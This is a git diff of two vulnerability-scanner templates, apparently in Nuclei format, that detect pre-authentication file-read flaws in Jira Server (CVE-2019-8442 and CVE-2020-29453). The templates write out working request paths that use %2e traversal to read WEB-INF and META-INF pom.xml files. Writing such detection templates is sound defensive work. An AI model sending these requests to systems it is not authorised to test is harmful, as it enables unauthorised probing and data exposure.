diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml
index c1400479b9..74622a2fa8 100644
--- a/cves/2019/CVE-2019-8442.yaml
+++ b/cves/2019/CVE-2019-8442.yaml
@@ -8,21 +8,18 @@ info:
tags: cve,cve2019,atlassian,jira,lfi
requests:
- - raw:
- - |
- GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: deflate
+ - method: GET
+ path:
+ - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
+ - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- - com.atlassian.jira
+ - 'com.atlassian.jira'
part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml
new file mode 100644
index 0000000000..3e39b3447e
--- /dev/null
+++ b/cves/2020/CVE-2020-29453.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-29453
+
+info:
+ name: Pre-Auth Limited Arbitrary File Read in Jira Server
+ author: dwisiswant0
+ severity: medium
+ description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
+ reference: https://jira.atlassian.com/browse/JRASERVER-72014
+ tags: cve,cve2020,atlassian,jira,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
+ - "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'com.atlassian.jira'
+ part: body
\ No newline at end of file